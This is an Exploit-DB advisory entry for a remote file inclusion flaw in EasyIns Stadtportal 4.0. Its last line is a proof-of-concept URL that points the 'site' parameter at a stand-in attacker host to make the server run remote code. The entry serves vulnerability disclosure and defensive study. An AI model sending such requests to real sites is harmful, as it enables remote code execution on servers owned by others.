EasyIns Stadtportal 4.0 - 'Site' Remote File Inclusion

EDB-ID:

24311




Platform:

PHP

Date:

2004-07-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/10795/info

EasyIns Stadtportal is reported prone to a vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

EasyIns Stadtportal version 4 is reported prone to this issue. Other versions may be affected as well.

http://www.example.com/stadtportal-path/index.php?site=http://www.evil-host.com